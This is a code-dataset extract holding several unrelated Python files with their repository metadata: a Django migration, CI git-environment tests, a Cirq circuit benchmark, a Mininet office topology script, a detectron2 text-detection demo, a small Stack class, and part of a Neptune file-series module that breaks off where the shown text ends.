| 0.640884
|
from __future__ import unicode_literals
from django.db import migrations
import mep.accounts.models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0018_merge_20180418_1607'),
]
operations = [
migrations.AlterField(
model_name='borrow',
name='end_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
migrations.AlterField(
model_name='borrow',
name='start_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
]
| true
| true
|
f707bcfbcc2754c7894e88a284b9c8d6dc1beda8
| 2,976
|
py
|
Python
|
packages/python/tests/ci/git_env.py
|
LaudateCorpus1/m
|
57e258ddb1347f8e29673410e12575d203bb19c8
|
[
"MIT"
] | null | null | null |
packages/python/tests/ci/git_env.py
|
LaudateCorpus1/m
|
57e258ddb1347f8e29673410e12575d203bb19c8
|
[
"MIT"
] | null | null | null |
packages/python/tests/ci/git_env.py
|
LaudateCorpus1/m
|
57e258ddb1347f8e29673410e12575d203bb19c8
|
[
"MIT"
] | 1
|
2021-12-31T13:25:33.000Z
|
2021-12-31T13:25:33.000Z
|
from unittest.mock import patch
from m.ci.config import Config, GitFlowConfig, MFlowConfig, Workflow
from m.ci.git_env import GitEnv, get_git_env
from m.core import issue
from m.core.fp import Good
from m.core.io import EnvVars
from ..util import FpTestCase
class GitEnvTest(FpTestCase):
config = Config(
owner='jmlopez-rod',
repo='m',
version='0.0.0',
m_dir='m',
workflow=Workflow.FREE_FLOW,
git_flow=GitFlowConfig(),
m_flow=MFlowConfig(),
)
env_vars = EnvVars(
ci_env=True,
github_token='super_secret_like_damn',
server_url='abc.xyz',
run_id='404',
run_number='1',
run_url='http://abc.xyz/404',
git_branch='refs/heads/master',
git_sha='git-sha-abc-123',
)
def test_local(self):
self.env_vars.ci_env = False
result = get_git_env(self.config, self.env_vars)
self.assert_ok(result)
self.assertDictEqual(
result.value.__dict__,
GitEnv(
sha='git-sha-abc-123',
branch='master',
target_branch='master',
).__dict__,
)
def test_read_git_env_fail(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.return_value = issue('made up issue')
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertIsNotNone(err.cause)
self.assertEqual(err.cause.message, 'made up issue')
def test_bad_github_response(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [Good({}), Good({})]
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertEqual(
err.cause.message,
'`repository` path was not found',
)
def test_pass(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [
Good(
dict(
repository=dict(
commit=dict(
message='Merge sha1 into sha2',
),
),
),
),
Good(
dict(
repository=dict(
commit=dict(
oid='123456789',
message='commit message',
),
),
),
),
]
result = get_git_env(self.config, self.env_vars)
self.assertFalse(result.is_bad)
| 32.347826
| 68
| 0.511425
|
from unittest.mock import patch
from m.ci.config import Config, GitFlowConfig, MFlowConfig, Workflow
from m.ci.git_env import GitEnv, get_git_env
from m.core import issue
from m.core.fp import Good
from m.core.io import EnvVars
from ..util import FpTestCase
class GitEnvTest(FpTestCase):
config = Config(
owner='jmlopez-rod',
repo='m',
version='0.0.0',
m_dir='m',
workflow=Workflow.FREE_FLOW,
git_flow=GitFlowConfig(),
m_flow=MFlowConfig(),
)
env_vars = EnvVars(
ci_env=True,
github_token='super_secret_like_damn',
server_url='abc.xyz',
run_id='404',
run_number='1',
run_url='http://abc.xyz/404',
git_branch='refs/heads/master',
git_sha='git-sha-abc-123',
)
def test_local(self):
self.env_vars.ci_env = False
result = get_git_env(self.config, self.env_vars)
self.assert_ok(result)
self.assertDictEqual(
result.value.__dict__,
GitEnv(
sha='git-sha-abc-123',
branch='master',
target_branch='master',
).__dict__,
)
def test_read_git_env_fail(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.return_value = issue('made up issue')
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertIsNotNone(err.cause)
self.assertEqual(err.cause.message, 'made up issue')
def test_bad_github_response(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [Good({}), Good({})]
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertEqual(
err.cause.message,
'`repository` path was not found',
)
def test_pass(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [
Good(
dict(
repository=dict(
commit=dict(
message='Merge sha1 into sha2',
),
),
),
),
Good(
dict(
repository=dict(
commit=dict(
oid='123456789',
message='commit message',
),
),
),
),
]
result = get_git_env(self.config, self.env_vars)
self.assertFalse(result.is_bad)
| true
| true
|
f707bd3e256af4b86d84f1b1920f35618103429e
| 3,025
|
py
|
Python
|
benchmark/startCirq2117.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startCirq2117.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startCirq2117.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=37
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=9
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=34
c.append(cirq.Z.on(input_qubit[3])) # number=35
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=36
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.H.on(input_qubit[0])) # number=5
c.append(cirq.H.on(input_qubit[1])) # number=6
c.append(cirq.H.on(input_qubit[2])) # number=7
c.append(cirq.H.on(input_qubit[3])) # number=8
c.append(cirq.H.on(input_qubit[3])) # number=31
c.append(cirq.CZ.on(input_qubit[0],input_qubit[3])) # number=32
c.append(cirq.H.on(input_qubit[3])) # number=33
c.append(cirq.X.on(input_qubit[3])) # number=27
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3])) # number=28
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[0])) # number=14
c.append(cirq.H.on(input_qubit[1])) # number=30
c.append(cirq.CZ.on(input_qubit[2],input_qubit[0])) # number=15
c.append(cirq.H.on(input_qubit[0])) # number=16
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=20
c.append(cirq.X.on(input_qubit[2])) # number=21
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=22
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=17
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=23
c.append(cirq.X.on(input_qubit[2])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=25
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=19
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq2117.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
| 36.445783
| 77
| 0.684959
|
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
from cirq.contrib.svg import SVGCircuit
def make_circuit(n: int, input_qubit):
c = cirq.Circuit()
c.append(cirq.H.on(input_qubit[0])) c.append(cirq.H.on(input_qubit[1])) c.append(cirq.H.on(input_qubit[2])) c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) c.append(cirq.Z.on(input_qubit[3])) c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) c.append(cirq.H.on(input_qubit[3])) c.append(cirq.H.on(input_qubit[0])) c.append(cirq.H.on(input_qubit[1])) c.append(cirq.H.on(input_qubit[2])) c.append(cirq.H.on(input_qubit[3])) c.append(cirq.H.on(input_qubit[3])) c.append(cirq.CZ.on(input_qubit[0],input_qubit[3])) c.append(cirq.H.on(input_qubit[3])) c.append(cirq.X.on(input_qubit[3])) c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3])) c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) c.append(cirq.H.on(input_qubit[0])) c.append(cirq.H.on(input_qubit[1])) c.append(cirq.CZ.on(input_qubit[2],input_qubit[0])) c.append(cirq.H.on(input_qubit[0])) c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) c.append(cirq.X.on(input_qubit[2])) c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) c.append(cirq.X.on(input_qubit[2])) c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq2117.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
| true
| true
|
f707be165739e0087fa738d5095f6a55983e7b80
| 4,453
|
py
|
Python
|
mininet/dopOffice1_topo.py
|
Konstantin-Minachkin/Ryu_SDN_Controller
|
2fd1c3e69b33a8db70ea1eb9303751c1afdaf4e9
|
[
"Apache-2.0"
] | null | null | null |
mininet/dopOffice1_topo.py
|
Konstantin-Minachkin/Ryu_SDN_Controller
|
2fd1c3e69b33a8db70ea1eb9303751c1afdaf4e9
|
[
"Apache-2.0"
] | null | null | null |
mininet/dopOffice1_topo.py
|
Konstantin-Minachkin/Ryu_SDN_Controller
|
2fd1c3e69b33a8db70ea1eb9303751c1afdaf4e9
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Region office topology.
Office has tro floors
_________terminate_switch_____________________
| | |
switch-1-floor switch-2-floor
| | |
hosts switchF2 hosts
|
hosts
Hosts consist of PC+Phones, ATMs or Security devices (camers, etc)
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
"Simple topology example."
def __init__( self, hosts_per_sw, hnum, tnum):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
ts1 = self.addSwitch( 's1', dpid='%x' % 41)
s_fl1 = self.addSwitch( 's_fl1', dpid='%x' % 42)
s_fl2 = self.addSwitch( 's_fl2', dpid='%x' % 43)
s_f2_2 = self.addSwitch( 's_f2_2', dpid='%x' % 44)
self.addLink( ts1, s_fl1, 2, 1 )
self.addLink( ts1, s_fl2, 3, 1 )
self.addLink( s_fl2, s_f2_2, 2, 1 )
sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
self.addLink( sec1, s_fl1, 0, 2 )
self.addLink( sec2, s_fl2, 0, 3 )
atm1 = self.addHost( 'atm1', ip='172.16.26.18/28')
atm2 = self.addHost( 'atm2', ip='172.16.26.19/28')
atm3 = self.addHost( 'atm3', ip='172.16.26.20/28')
self.addLink( atm2, s_f2_2, 0, 2 )
self.addLink( atm3, s_f2_2, 0, 3 )
self.addLink( atm1, s_fl1, 0, 3 )
pnum = 4
# Add links halv of hosts to one switch - half to another
for i in range(hosts_per_sw):
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl1, 0, pnum )
self.addLink( t, s_fl1, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl2, 0, pnum )
self.addLink( t, s_fl2, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_f2_2, 0, pnum )
self.addLink( t, s_f2_2, 0, pnum+1 )
hnum+=1
tnum+=1
pnum += 2
def runMinimalTopo():
CONTROLLER_IP = '192.168.2.4'
num = 4
hnum = 130
tnum = 194
topo = MyTopo(num, hnum, tnum) # Create an instance of our topology
net = Mininet(topo = topo,
controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
switch=partial(OVSSwitch, protocols='OpenFlow13'),
autoSetMacs=True )
net.start()
for i in range(num):
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('sec1').cmd('ip route add default via 172.16.28.33')
net.get('sec2').cmd('ip route add default via 172.16.28.33')
net.get('atm1').cmd('ip route add default via 172.16.26.17')
net.get('atm2').cmd('ip route add default via 172.16.26.17')
net.get('atm3').cmd('ip route add default via 172.16.26.17')
net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
cli = CLI(net)
# After the user exits the CLI, shutdown the network.
net.stop()
if __name__ == '__main__':
# This runs if this file is executed directly
setLogLevel( 'info' )
runMinimalTopo()
topos = { 'mytopo': MyTopo }
| 35.624
| 75
| 0.534247
|
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
def __init__( self, hosts_per_sw, hnum, tnum):
Topo.__init__( self )
ts1 = self.addSwitch( 's1', dpid='%x' % 41)
s_fl1 = self.addSwitch( 's_fl1', dpid='%x' % 42)
s_fl2 = self.addSwitch( 's_fl2', dpid='%x' % 43)
s_f2_2 = self.addSwitch( 's_f2_2', dpid='%x' % 44)
self.addLink( ts1, s_fl1, 2, 1 )
self.addLink( ts1, s_fl2, 3, 1 )
self.addLink( s_fl2, s_f2_2, 2, 1 )
sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
self.addLink( sec1, s_fl1, 0, 2 )
self.addLink( sec2, s_fl2, 0, 3 )
atm1 = self.addHost( 'atm1', ip='172.16.26.18/28')
atm2 = self.addHost( 'atm2', ip='172.16.26.19/28')
atm3 = self.addHost( 'atm3', ip='172.16.26.20/28')
self.addLink( atm2, s_f2_2, 0, 2 )
self.addLink( atm3, s_f2_2, 0, 3 )
self.addLink( atm1, s_fl1, 0, 3 )
pnum = 4
for i in range(hosts_per_sw):
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl1, 0, pnum )
self.addLink( t, s_fl1, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl2, 0, pnum )
self.addLink( t, s_fl2, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_f2_2, 0, pnum )
self.addLink( t, s_f2_2, 0, pnum+1 )
hnum+=1
tnum+=1
pnum += 2
def runMinimalTopo():
CONTROLLER_IP = '192.168.2.4'
num = 4
hnum = 130
tnum = 194
topo = MyTopo(num, hnum, tnum)
net = Mininet(topo = topo,
controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
switch=partial(OVSSwitch, protocols='OpenFlow13'),
autoSetMacs=True )
net.start()
for i in range(num):
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('sec1').cmd('ip route add default via 172.16.28.33')
net.get('sec2').cmd('ip route add default via 172.16.28.33')
net.get('atm1').cmd('ip route add default via 172.16.26.17')
net.get('atm2').cmd('ip route add default via 172.16.26.17')
net.get('atm3').cmd('ip route add default via 172.16.26.17')
net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
cli = CLI(net)
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
runMinimalTopo()
topos = { 'mytopo': MyTopo }
| true
| true
|
f707be9122c5f2ae0d90397f5f92a7c44e559c95
| 3,657
|
py
|
Python
|
demo/icdar2013_detection.py
|
muchwater/TextFuseNet_EfficientNet
|
444ee48a9021f31422ca5a2d13aaffa79a950aa0
|
[
"MIT"
] | 348
|
2020-09-22T10:27:20.000Z
|
2022-03-31T08:17:18.000Z
|
demo/icdar2013_detection.py
|
muchwater/TextFuseNet_EfficientNet
|
444ee48a9021f31422ca5a2d13aaffa79a950aa0
|
[
"MIT"
] | 89
|
2020-09-24T04:31:54.000Z
|
2022-03-31T07:46:22.000Z
|
demo/icdar2013_detection.py
|
muchwater/TextFuseNet_EfficientNet
|
444ee48a9021f31422ca5a2d13aaffa79a950aa0
|
[
"MIT"
] | 102
|
2020-09-24T11:30:07.000Z
|
2022-03-24T12:18:37.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import argparse
import glob
import multiprocessing as mp
import os
import time
import cv2
import tqdm
import numpy as np
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from detectron2.utils.logger import setup_logger
from predictor import VisualizationDemo
# constants
WINDOW_NAME = "COCO detections"
def setup_cfg(args):
# load config from file and command-line arguments
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
# Set model
cfg.MODEL.WEIGHTS = args.weights
# Set score_threshold for builtin models
cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold
cfg.freeze()
return cfg
def get_parser():
parser = argparse.ArgumentParser(description="Detectron2 Demo")
parser.add_argument(
"--config-file",
default="./configs/ocr/icdar2013_101_FPN.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--weights",
default="./out_dir_r101/icdar2013_model/model_ic13_r101.pth",
metavar="pth",
help="the model used to inference",
)
parser.add_argument(
"--input",
default="./input_images/*.jpg",
nargs="+",
help="the folder of icdar2013 test images"
)
parser.add_argument(
"--output",
default="./test_icdar2013/",
help="A file or directory to save output visualizations. "
"If not given, will show output in an OpenCV window.",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--opts",
help="Modify config options using the command-line 'KEY VALUE' pairs",
default=[],
nargs=argparse.REMAINDER,
)
return parser
def save_result_to_txt(txt_save_path,prediction,polygons):
file = open(txt_save_path,'w')
classes = prediction['instances'].pred_classes
boxes = prediction['instances'].pred_boxes.tensor
for i in range(len(classes)):
if classes[i]==0:
xmin = str(int(boxes[i][0]))
ymin = str(int(boxes[i][1]))
xmax = str(int(boxes[i][2]))
ymax = str(int(boxes[i][3]))
file.writelines(xmin+','+ymin+','+xmax+','+ymax+',')
file.writelines('\r\n')
file.close()
if __name__ == "__main__":
args = get_parser().parse_args()
cfg = setup_cfg(args)
detection_demo = VisualizationDemo(cfg)
test_images_path = args.input
output_path = args.output
start_time_all = time.time()
img_count = 0
for i in glob.glob(test_images_path):
print(i)
img_name = os.path.basename(i)
img_save_path = output_path + img_name.split('.')[0] + '.jpg'
img = cv2.imread(i)
start_time = time.time()
prediction, vis_output, polygons = detection_demo.run_on_image(img)
txt_save_path = output_path + 'res_img' + img_name.split('.')[0].split('img')[1] + '.txt'
save_result_to_txt(txt_save_path,prediction,polygons)
print("Time: {:.2f} s / img".format(time.time() - start_time))
vis_output.save(img_save_path)
img_count += 1
print("Average Time: {:.2f} s /img".format((time.time() - start_time_all) / img_count))
| 28.348837
| 97
| 0.649166
|
import argparse
import glob
import multiprocessing as mp
import os
import time
import cv2
import tqdm
import numpy as np
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from detectron2.utils.logger import setup_logger
from predictor import VisualizationDemo
WINDOW_NAME = "COCO detections"
def setup_cfg(args):
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.MODEL.WEIGHTS = args.weights
cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold
cfg.freeze()
return cfg
def get_parser():
parser = argparse.ArgumentParser(description="Detectron2 Demo")
parser.add_argument(
"--config-file",
default="./configs/ocr/icdar2013_101_FPN.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--weights",
default="./out_dir_r101/icdar2013_model/model_ic13_r101.pth",
metavar="pth",
help="the model used to inference",
)
parser.add_argument(
"--input",
default="./input_images/*.jpg",
nargs="+",
help="the folder of icdar2013 test images"
)
parser.add_argument(
"--output",
default="./test_icdar2013/",
help="A file or directory to save output visualizations. "
"If not given, will show output in an OpenCV window.",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--opts",
help="Modify config options using the command-line 'KEY VALUE' pairs",
default=[],
nargs=argparse.REMAINDER,
)
return parser
def save_result_to_txt(txt_save_path,prediction,polygons):
file = open(txt_save_path,'w')
classes = prediction['instances'].pred_classes
boxes = prediction['instances'].pred_boxes.tensor
for i in range(len(classes)):
if classes[i]==0:
xmin = str(int(boxes[i][0]))
ymin = str(int(boxes[i][1]))
xmax = str(int(boxes[i][2]))
ymax = str(int(boxes[i][3]))
file.writelines(xmin+','+ymin+','+xmax+','+ymax+',')
file.writelines('\r\n')
file.close()
if __name__ == "__main__":
args = get_parser().parse_args()
cfg = setup_cfg(args)
detection_demo = VisualizationDemo(cfg)
test_images_path = args.input
output_path = args.output
start_time_all = time.time()
img_count = 0
for i in glob.glob(test_images_path):
print(i)
img_name = os.path.basename(i)
img_save_path = output_path + img_name.split('.')[0] + '.jpg'
img = cv2.imread(i)
start_time = time.time()
prediction, vis_output, polygons = detection_demo.run_on_image(img)
txt_save_path = output_path + 'res_img' + img_name.split('.')[0].split('img')[1] + '.txt'
save_result_to_txt(txt_save_path,prediction,polygons)
print("Time: {:.2f} s / img".format(time.time() - start_time))
vis_output.save(img_save_path)
img_count += 1
print("Average Time: {:.2f} s /img".format((time.time() - start_time_all) / img_count))
| true
| true
|
f707bf07c1bddf492074314149653fdbdd798735
| 495
|
py
|
Python
|
stx/utils/stack.py
|
bakasoft/stx
|
ef6ad209c2acaed83df37f8ebbec52ffc0ff1909
|
[
"MIT"
] | 1
|
2020-04-07T04:42:11.000Z
|
2020-04-07T04:42:11.000Z
|
stx/utils/stack.py
|
stx-lang/python-stx
|
ef6ad209c2acaed83df37f8ebbec52ffc0ff1909
|
[
"MIT"
] | 6
|
2020-03-21T20:16:07.000Z
|
2020-04-10T02:53:38.000Z
|
stx/utils/stack.py
|
stx-lang/python-stx
|
ef6ad209c2acaed83df37f8ebbec52ffc0ff1909
|
[
"MIT"
] | null | null | null |
from typing import Generic, TypeVar, List, Optional
T = TypeVar('T')
class Stack(Generic[T]):
def __init__(self):
self.items: List[T] = []
def empty(self) -> bool:
return len(self.items) == 0
def push(self, item: T):
self.items.append(item)
def pop(self) -> T:
return self.items.pop()
def peek(self, default: Optional[T] = None) -> Optional[T]:
if len(self.items) > 0:
return self.items[-1]
return default
| 19.8
| 63
| 0.567677
|
from typing import Generic, TypeVar, List, Optional
T = TypeVar('T')
class Stack(Generic[T]):
def __init__(self):
self.items: List[T] = []
def empty(self) -> bool:
return len(self.items) == 0
def push(self, item: T):
self.items.append(item)
def pop(self) -> T:
return self.items.pop()
def peek(self, default: Optional[T] = None) -> Optional[T]:
if len(self.items) > 0:
return self.items[-1]
return default
| true
| true
|
f707bf37626295dfe090a7a114f70e0c595e03b1
| 272
|
py
|
Python
|
zinnia/tests/implementations/custom_url_shortener.py
|
Boondockers-Welcome/django-blog-zinnia
|
34aa1e7304f6686c61da81fbd93d082e5cd3144b
|
[
"BSD-3-Clause"
] | 1,522
|
2015-01-02T05:54:02.000Z
|
2022-03-31T04:13:14.000Z
|
zinnia/tests/implementations/custom_url_shortener.py
|
Boondockers-Welcome/django-blog-zinnia
|
34aa1e7304f6686c61da81fbd93d082e5cd3144b
|
[
"BSD-3-Clause"
] | 205
|
2015-01-02T19:29:37.000Z
|
2022-03-11T23:19:49.000Z
|
zinnia/tests/implementations/custom_url_shortener.py
|
Boondockers-Welcome/django-blog-zinnia
|
34aa1e7304f6686c61da81fbd93d082e5cd3144b
|
[
"BSD-3-Clause"
] | 632
|
2015-01-02T05:54:02.000Z
|
2022-03-25T17:07:32.000Z
|
"""Custom url shortener backend for testing Zinnia"""
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured('This backend only exists for testing')
def backend(entry):
"""Custom url shortener backend for testing Zinnia"""
return ''
| 27.2
| 66
| 0.768382
|
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured('This backend only exists for testing')
def backend(entry):
return ''
| true
| true
|
f707bfbef627ade68ba3332bb3383f70ec53f6b8
| 4,069
|
py
|
Python
|
neptune/new/attributes/series/file_series.py
|
Raalsky/neptune-client
|
24ac58581774e61056d49cd1a22727799c14ad54
|
[
"Apache-2.0"
] | 254
|
2020-01-27T14:18:57.000Z
|
2022-03-31T21:40:33.000Z
|
neptune/new/attributes/series/file_series.py
|
Raalsky/neptune-client
|
24ac58581774e61056d49cd1a22727799c14ad54
|
[
"Apache-2.0"
] | 160
|
2020-02-05T11:00:22.000Z
|
2022-03-31T08:50:24.000Z
|
neptune/new/attributes/series/file_series.py
|
Raalsky/neptune-client
|
24ac58581774e61056d49cd1a22727799c14ad54
|
[
"Apache-2.0"
] | 23
|
2020-02-07T09:19:50.000Z
|
2022-02-15T09:52:56.000Z
|
#
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import imghdr
import os
import pathlib
from typing import List, Optional, Iterable
from neptune.new.internal.utils import base64_encode
from neptune.new.exceptions import FileNotFound, OperationNotSupported
from neptune.new.types import File
from neptune.new.types.series.file_series import FileSeries as FileSeriesVal
from neptune.new.internal.operation import (
ImageValue,
LogImages,
ClearImageLog,
Operation,
)
from neptune.new.attributes.series.series import Series
from neptune.utils import split_to_chunks
Val = FileSeriesVal
Data = File
class FileSeries(Series[Val, Data]):
def _get_log_operations_from_value(
self, value: Val, step: Optional[float], timestamp: float
) -> List[Operation]:
values = [
LogImages.ValueType(
ImageValue(
data=self._get_base64_image_content(val),
name=value.name,
description=value.description,
),
step=step,
ts=timestamp,
)
for val in value.values
]
return [LogImages(self._path, chunk) for chunk in split_to_chunks(values, 1)]
def _get_clear_operation(self) -> Operation:
return ClearImageLog(self._path)
def _data_to_value(self, values: Iterable, **kwargs) -> Val:
